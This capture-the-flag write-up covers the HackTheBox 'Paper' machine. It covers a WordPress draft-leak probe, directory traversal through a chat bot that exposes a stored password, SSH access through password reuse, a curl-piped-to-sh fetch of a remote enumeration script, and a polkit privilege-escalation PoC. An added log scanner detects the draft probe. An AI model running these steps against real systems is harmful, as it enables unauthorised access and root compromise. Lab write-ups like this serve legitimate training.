HackTheBox: Paper


Throughout this writeup, I will reference the machine IP address as 10.10.11.143.

Scanning & Enumeration

Network Scan

I started with a network scan using nmap: nmap -sC -sV 10.10.11.143. The open ports are 22 (SSH), 80 (HTTP) and 443 (HTTPS).

Web Scan

I browsed to http://10.10.11.143, but it only served the default CentOS installation page. I then ran feroxbuster to find other directories or files, but nothing interesting came back. Nikto (nikto -host http://10.10.11.143) turned up one interesting result, a non-standard response header that leaks an internal hostname:

Uncommon header 'x-backend-server' found, with contents: office.paper

I added office.paper into my /etc/hosts

10.10.11.143    office.paper

This allowed me to browse to http://office.paper, which is a WordPress website. There’s an interesting post where Nick mentions “secret content” in the drafts.

Vulnerability Analysis

WordPress versions up to and including 5.2.3 have an unauthenticated private/draft post disclosure bug (CVE-2019-17671, fixed in 5.2.4). The PoC is extremely simple: you just append static=1&orderBy=asc to the site URL, like this: http://office.paper/?static=1&orderBy=asc.
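The same probe seen from the defender's side, as an added example that is not part of the original writeup: a small Node.js scanner that flags requests carrying a non-empty static query parameter in combined-format web access logs. The log lines, IPs, timestamps and user agents below are constructed for the example.

```javascript
// Added example (not from the original writeup): spot the "?static=1" draft-leak
// probe in Apache/nginx combined-format access logs. The sample log lines are
// constructed for this example; IPs, timestamps and user agents are made up.

// Combined log format:
// ip ident authuser [time] "METHOD target PROTO" status size "referer" "agent"
const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+/;

function parseLine(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null;
  return { ip: m[1], time: m[2], method: m[3], target: m[4], status: Number(m[5]) };
}

// PHP exposes query keys case-sensitively, so only an exact, non-empty "static"
// parameter is flagged. "orderBy" was appended in the writeup too, so it is
// reported to help triage, but it is not required for a hit.
function isDraftLeakProbe(target) {
  let url;
  try {
    url = new URL(target, "http://placeholder.invalid");
  } catch (e) {
    return false;
  }
  const value = url.searchParams.get("static");
  return value !== null && value !== "";
}

function scan(lines) {
  const hits = [];
  for (const line of lines) {
    const rec = parseLine(line);
    if (rec && isDraftLeakProbe(rec.target)) {
      const url = new URL(rec.target, "http://placeholder.invalid");
      hits.push({
        ip: rec.ip,
        time: rec.time,
        target: rec.target,
        status: rec.status,
        hasOrderBy: url.searchParams.has("orderBy"),
      });
    }
  }
  return hits;
}

// Constructed sample: one ordinary visit, the writeup's probe, a login page hit,
// an empty static value, a differently ordered probe and an unparseable line.
const SAMPLE_LOG = [
  '10.10.14.5 - - [06/Feb/2022:14:01:10 +0000] "GET / HTTP/1.1" 200 40112 "-" "Mozilla/5.0"',
  '10.10.14.5 - - [06/Feb/2022:14:01:12 +0000] "GET /?static=1&orderBy=asc HTTP/1.1" 200 41233 "-" "curl/7.81.0"',
  '10.10.14.9 - - [06/Feb/2022:14:02:00 +0000] "GET /wp-login.php?redirect_to=%2Fwp-admin%2F HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
  '10.10.14.7 - - [06/Feb/2022:14:03:30 +0000] "GET /?static= HTTP/1.1" 200 40112 "-" "Mozilla/5.0"',
  '10.10.14.7 - - [06/Feb/2022:14:04:02 +0000] "GET /?p=42&static=true HTTP/1.1" 200 41233 "-" "python-requests/2.27"',
  'garbage line that does not parse',
];

if (typeof require !== "undefined" && require.main === module) {
  for (const hit of scan(SAMPLE_LOG)) console.log(hit);
}
```

A 200 response to such a request on a WordPress site below 5.2.4 is a strong sign that drafts were read; on a patched site the same request is still worth a look, since it tells you who is probing.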


We are now able to view the drafts, and one of them contains the "Secret Registration URL", which points at a second virtual host. All we need to do is add that hostname to /etc/hosts as well:

10.10.11.143    office.paper
10.10.11.143    chat.office.paper

Browsing to the secret registration URL shows it is hosting Rocket.Chat. We can fill out the registration form to gain access to the application. There is only one channel available, #general, which is read-only for our account. There is also a bot account named recyclops, which offers a couple of commands: file <name> and list <dir>. Since we cannot post in #general, we can direct message recyclops instead.


So we have directory traversal: the bot hands the file and list arguments to the filesystem without confining them to its own working directory, so ../ sequences walk straight out of it. However, we cannot read user.txt right away because it is owned by dwight. Maybe we can analyse the bot itself instead?

Exploitation

We can list ../hubot, which holds all the source code of the recyclops bot. The interesting file is ../hubot/.env (retrieved with file ../hubot/.env), which contains:

<!=====Contents of file ../hubot/.env=====>
export ROCKETCHAT_URL='http://127.0.0.1:48320'
export ROCKETCHAT_USER=recyclops
export ROCKETCHAT_PASSWORD=Queenofblad3s!23
export ROCKETCHAT_USESSL=false
export RESPOND_TO_DM=true
export RESPOND_TO_EDITED=true
export PORT=8000
export BIND_ADDRESS=127.0.0.1
<!=====End of file ../hubot/.env=====>

Trying to log in to the recyclops account on Rocket.Chat with this password errors out. However, we now have a password, and we know that Dwight created the bot, so password reuse is worth a try. SSH in as Dwight with the password found in the Hubot .env: ssh dwight@10.10.11.143, and just like that, the user is pwned.

Privilege Escalation

We can run the handy-dandy LinPEAS to find privilege escalation vectors. If the target can reach GitHub, all we need to do is download it with curl and pipe it to sh (otherwise, host it on the attacking machine, for example with python3 -m http.server, and fetch it from there).

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

One of the first alerts we get concerns sudo 1.8.29 and CVE-2021-3560. The sudo version is worth noting, but CVE-2021-3560 is not a sudo bug: it is a race condition in polkit's D-Bus authorization handling (polkit 0.113 through 0.118) in which a request whose sender disconnects before the authorization check completes is treated as authorized, letting an unprivileged local user create a new account, including one in the wheel group. There is a public PoC shell script for it; we just need to curl poc.sh and run it, passing a username and password of our own choosing. Because the exploit has to win a race, it may take a few runs before the new user actually appears.

./poc.sh -u=test -p=test
su - test
sudo bash